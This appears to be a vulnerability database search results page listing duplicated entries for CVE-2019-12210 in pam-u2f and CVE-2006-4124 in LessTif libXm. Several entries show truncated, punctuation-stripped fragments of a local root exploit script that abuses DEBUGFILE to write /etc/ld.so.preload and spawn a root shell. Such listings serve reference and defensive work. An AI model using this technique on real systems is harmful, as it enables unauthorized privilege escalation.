12 matches found
CVE-2019-12210
In Yubico pam-u2f 1.0.7, when configured with debug and a custom debug log file is set using debugfile, that file descriptor is not closed when a new process is spawned. This leads to the file descriptor being inherited into the child process; the child process can then read from and write to it...
Design/Logic Flaw
In Yubico pam-u2f 1.0.7, when configured with debug and a custom debug log file is set using debugfile, that file descriptor is not closed when a new process is spawned. This leads to the file descriptor being inherited into the child process; the child process can then read from and write to it...
CVE-2019-12210
In Yubico pam-u2f 1.0.7, when configured with debug and a custom debug log file is set using debugfile, that file descriptor is not closed when a new process is spawned. This leads to the file descriptor being inherited into the child process; the child process can then read from and write to it...
CVE-2019-12210
In Yubico pam-u2f 1.0.7, when configured with debug and a custom debug log file is set using debugfile, that file descriptor is not closed when a new process is spawned. This leads to the file descriptor being inherited into the child process; the child process can then read from and write to it...
CVE-2006-4124
The libXm library in LessTif 0.95.0 and earlier allows local users to gain privileges via the DEBUGFILE environment variable, which is used to create world-writable files when libXm is run from a setuid program...
liblesstif <= 2-0.93.94-4mdk (DEBUG_FILE) Local Root Exploit
No description provided by source. !/bin/sh echo echo mtink libXm local root exploit echo [email protected] echo umask 000 export DEBUGFILE=/etc/ld.so.preload cat /tmp/lib.c EOF include unistd.h void initvoid if getuid!=0 && geteuid==0 setuid0; unlink/etc/ld.so.preload; execl/bin/bash, bash, 0; EOF...
CVE-2006-4124
The libXm library in LessTif 0.95.0 and earlier allows local users to gain privileges via the DEBUGFILE environment variable, which is used to create world-writable files when libXm is run from a setuid program...
CVE-2006-4124
The libXm library in LessTif 0.95.0 and earlier allows local users to gain privileges via the DEBUGFILE environment variable, which is used to create world-writable files when libXm is run from a setuid program...
CVE-2006-4124
The libXm library in LessTif 0.95.0 and earlier allows local users to gain privileges via the DEBUGFILE environment variable, which is used to create world-writable files when libXm is run from a setuid program...
CVE-2006-4124
The CVE-2006-4124 issue affects the libXm library in LessTif
liblesstif 2-0.93.94-4mdk - 'DEBUG_FILE' Local Privilege Escalation
!/bin/sh echo echo "mtink libXm local root exploit" echo " [email protected] " echo umask 000 export DEBUGFILE="/etc/ld.so.preload" cat /tmp/lib.c void initvoid if getuid!=0 && geteuid==0 setuid0; unlink"/etc/ld.so.preload"; execl"/bin/bash", "bash", 0; EOF /usr/bin/gcc -o /tmp/lib.o -c /tmp/lib.c...
liblesstif 2-0.93.94-4mdk - DEBUG_FILE Local Privilege Escalation
liblesstif 2-0.93.94-4mdk - DEBUGFILE Local Privilege Escalation !/bin/sh echo echo "mtink libXm local root exploit" echo " [email protected] " echo umask 000 export DEBUGFILE="/etc/ld.so.preload" cat /tmp/lib.c void initvoid if getuid!=0 && geteuid==0 setuid0; unlink"/etc/ld.so.preload";...